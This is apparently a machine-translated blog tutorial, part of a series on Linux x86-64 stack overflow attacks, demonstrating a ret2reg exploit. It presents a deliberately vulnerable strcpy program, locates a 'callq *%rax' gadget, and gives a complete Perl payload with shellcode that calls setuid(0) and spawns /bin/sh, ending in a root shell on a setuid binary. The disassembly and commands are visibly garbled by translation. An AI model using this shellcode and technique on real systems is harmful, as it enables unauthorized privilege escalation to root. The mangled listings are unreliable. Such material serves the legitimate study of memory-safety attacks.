Stack Overflow Attack series: Shellcode root privileges in Linux x86 64-bit attacks (vii) exploit register attacks

In (vi) we mentioned the use of fixed stack address attack mode, but in practice, the system default parameters will not be 0

Cat/proc/sys/kernel/randomize_va_space

So in the series of six out of the meaning of the attack, but anything will be a loophole, we have another register-based attack

Vulnerability Code

Vulnerableret2reg.c

#include <stdio.h> #include <string.h>void evilfunction (char* input) {  char buffer[1000];  strcpy (buffer, input);} int main (int argc, char** argv) {   evilfunction (argv[1]);   return 0;}

Let's first look at the function strcpy

Char *strcpy (char *dest, const char *SRC);

Then it means that the address of the array returned is the address of the Dest array in the register Rax, and the address strcpy returns is the address of the buffer in the function evilfunction, That is, the address in the Rax register is the starting position of the buffer in evilfunction, and fortunately, in the Evilfunction function, there is no operation on the Rax register behind the strcpy. The function evilfunction also has no return value (Rax is the return value register).

Compilation of Evilfunction functions

00000000004004C4 <evilfunction>:  4004c4:55                   push   %rbp 4004c5:48,  e5             mov    %rsp,%rbp  4004c8:48 bayi EC (XX) xx sub    $0x400,%rsp  4004cf:48, BD, FC FF FF mov    %rdi,-0x3f8 (%RBP)  4004d6 : 8b FC FF FF mov    -0X3F8 (%RBP),%RDX  4004dd:48 8d/FC FF Lea    -0x3f0 (%RBP),%rax  4004e4:4 8 d6             mov    %rdx,%rsi  4004e7:48 C7             mov    %rax,%rdi  4004ea:e8 d9 fe FF FF       CALLQ  4003c8 <[email protected]>  4004ef:c9                   leaveq   4004f0:c3                   

We see no instructions behind CALLQ on any changes to the Rax register. The Rax register is our attack direction 1. We're going to find a call%rax's command address, compile vulnerableret2reg.c into an executable file

Gcc-z execstack-o vulnerableret2reg vulnerableret2reg.cobjdump-d vulnerableret2reg |grep rax > Rax.txtcat rax.txt 40 03b4:0f 1f NOPL 0x0 (%rax) 4003ed:50 push%rax 400410:48 8b                200489 (%rip),%rax # 6008a0 <_dynamic 0x190= "" > 400417:48-c0 test%rax,%rax 40041c:ff D0   CALLQ *%rax 400447:48 8b 0x200492 mov (%rip),%rax # 6008e0 <dtor_idx 6351= "" >          40045d:48-D8 CMP%rbx,%rax 400462:66 0f 1f, NOPW (%rax,%rax,1) 400468:48 C0 01  Add $0x1,%rax 40046c:48 6d mov%rax,0x20046d (%rip) # 6008e0 <dtor_idx 6351= "" > 400473:ff c5 F8 callq *0x6006f8 (%rax,8) 40047a:48 8b 5f, mov 0x20045f (%rip),%rax # 600  8e0 <dtor_idx 6351= "" > 400481:48 D8 cmp%rbx,%rax 400494:66 2e 0f 1f/data32 data32 NOPW %cs:0x0 (%rax,%rax,1) 4004b3:48 c0 Test%rax,%rax 4004be:ff e0 jmpq *%rax 4004dd:48 8d FC FF FF Lea -0X3F0 (%RBP),%rax 4004e7:48 C7 mov%rax,%rdi 400500:48 8b F0 mov-0x10 (%RBP),%rax 4005    04:48 c0 Add $0x8,%rax 400508:48 8b XX mov (%rax),%rax 40050b:48, C7 mov          %rax,%rdi 400522:66 2e 0f data32 data32 data32 data32 nopw%cs:0x0 (%rax,%rax,1) 40057c:0f 1f 40 00 NOPL 0x0 (%rax) 4005c9:48 8b for mov 0x200118 (%rip),%rax # 6006e8 <__ctor_list__> 4005d0:                F8 FF CMP $0xffffffffffffffff,%rax 4005db:0f 1f, Nopl 0x0 (%rax,%rax,1) 4005e4:ff D0 CALLQ *%rax 4005e6:48 8b mov (%RBX),%rax 4005e9:48, F8 FF CMP $0XFFFFFFFFF Fffffff,%rax

Luckily, we saw Callq *%rax.

40041C:FF D0 callq *%rax

Command address is 40041c

2. Calculate the space to cover the return address

Lea    -0x3f0 (%RBP),%rax

That is, the starting address of buffer is relative to rbp-0x3f0 = decimal 1008 Plus 8 is the function return address.

3. Populate our array

' Perl-e ' print "\x90" X16;print "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\ x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 ";p rint" \x90 "x957; Print "\x1c\x04\x40\x00"

16+43+957=1016 at fill instruction address 40041c

4. Implementation of our Shellcode

When the function exits, the address of the RIP points to 40041c, and the execution machine instruction Callq *%rax, when the value in Rax is the starting address of the buffer array, then the contents of the buffer array will start executing. We just fill in the buffer array into the shellcode we want to perform, and the attack is perfect.

Deductive attack

Gcc-z execstack-o vulnerableret2reg vulnerableret2reg.cchmod u+s vulnerableret2regsu test./vulnerableret2reg ' perl-e ' Print "\x90" X16;print "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\ x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 ";p rint" \x90 "X957;print" \ X1c\x04\x40\x00 "' Sh4.1#whoamiroot

Everything as designed, you become root.

Stack attack is not simple

1. You need a buffer array that is long enough to fill your shellcode.

2. You need to not operate the register after the program.
3. You need to have the operation of the register in your program, and you can get the address of the code.

4. Of course you also need to specify the code that can be executed in the stack at compile time.

5. In order to become root you need the program to have S permissions.

Stack Overflow Attack series: Shellcode root privileges in Linux x86 64-bit attacks (vii) exploit register attacks